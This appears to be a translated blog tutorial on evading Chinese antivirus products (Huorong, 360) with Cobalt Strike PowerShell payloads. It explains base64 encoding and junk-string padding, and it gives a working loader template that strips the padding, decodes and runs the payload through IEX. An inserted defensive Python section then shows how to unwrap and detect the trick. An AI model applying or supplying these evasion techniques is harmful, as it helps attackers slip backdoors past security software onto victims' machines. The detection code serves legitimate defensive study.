AV Evasion: PowerShell & Obfuscation & Split Loading & Signature Modification & EXE Generation & Padding/Replacement

PowerShell - File Mode - Encoding to Bypass a Certain AV (Huorong)

CS is used here for the demonstration.

1. PowerShell - the payload is in file mode: the check-in code lives in a file, and PowerShell is used to execute that .ps1 file to check in.

2. PowerShell Command - the payload is in execution mode: the command is executed directly (it contains the check-in code).

First, a vanilla PowerShell file-mode payload is certainly detected and killed outright.

So we look at the code, find the feature that gets picked out, and modify it. Testing shows that this string of code is the main feature identified as a backdoor.

We simply base64-encode this string, then decode it again using PowerShell syntax:

$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($x))

The final result looks like this:

We verify again to see whether it is still detected: it bypasses Huorong directly, and after running it also checks in to CS successfully, which shows the modification worked.

PowerShell - File Mode - Padding Junk Data to Bypass a Certain AV (360)

1. Add the junk directly into the base64-encoded text, then restore it before decoding.

2. Add the junk directly into the original code, then restore it after decoding.

We take the PowerShell code that bypassed Huorong and scan it with 360; unfortunately it does not get through and is detected outright.

At this point we found that it is still the base64-encoded string that gets detected, so we thought of padding junk data into it, for example inserting (shmilyishacker) all over it, as shown below:

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

After adding it, we submit it to 360 again, and it bypasses detection successfully.

Now the problem: since we added junk data, decoding it as-is is obviously impossible, so we first strip the junk characters we inserted and only then decode, using the

replace() function:
Set-StrictMode -Version 2

$DoIt = @'
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
'@
$DoIt=$DoIt.Replace('shmilyishacker','')
$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $bb | wait-job | Receive-Job
}
else {
    IEX $bb
}

As expected, it also bypasses 360 detection, and the payload checks in successfully.
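From the analyst's side, the two layers described above (a literal .Replace() of the junk marker, then FromBase64String) can be replayed statically to recover what the loader would hand to IEX and to flag the pattern. The following is an added example, not code from the original post; the sample script is constructed in the shape of the loader above but encodes a benign Write-Host command, and the here-string and .Replace() regexes are assumptions that fit this particular shape.

```python
import base64
import re

# Constructed sample in the shape of the loader above: base64 text padded
# with the junk marker, which .Replace() strips before FromBase64String.
# The encoded content is a benign "Write-Host sample", not the post's payload.
SAMPLE_PS1 = """Set-StrictMode -Version 2
$DoIt = @'
V3JpdGUshmilyishackertSG9zdCBzshmilyishackerYW1wbGU=
'@
$DoIt=$DoIt.Replace('shmilyishacker','')
$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))
IEX $bb
"""

HERESTRING = re.compile(r"@'\s*\n(.*?)\n'@", re.S)
REPLACE_CALL = re.compile(r"\.Replace\('([^']*)'\s*,\s*'([^']*)'\)", re.I)


def indicators(script: str) -> dict:
    """Cheap static hints that the junk-padding trick is in use."""
    return {
        "replace_then_base64": bool(REPLACE_CALL.search(script))
        and "FromBase64String" in script,
        "iex_present": bool(re.search(r"\bIEX\b", script, re.I)),
    }


def unwrap(script: str):
    """Replay the obfuscation layers statically: apply every literal
    .Replace(old, new) to the here-string body, then base64-decode it.
    Returns the recovered text, or None if no valid base64 blob results
    (e.g. the junk was not removed, so the alphabet check fails)."""
    m = HERESTRING.search(script)
    if not m:
        return None
    blob = "".join(m.group(1).split())  # here-strings may span lines
    for old, new in REPLACE_CALL.findall(script):
        if old:  # PowerShell rejects an empty search string; skip it too
            blob = blob.replace(old, new)
    try:
        return base64.b64decode(blob, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    print(indicators(SAMPLE_PS1))
    print(unwrap(SAMPLE_PS1))  # Write-Host sample
```

Feeding the script without its .Replace() line returns None, which is exactly the failure the author works around: the padded blob is not valid base64 until the marker is removed.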


Reposting rules

"AV Evasion: PowerShell & Obfuscation & Split Loading & Signature Modification & EXE Generation & Padding/Replacement" by Shmily is licensed under the Creative Commons Attribution 4.0 International License.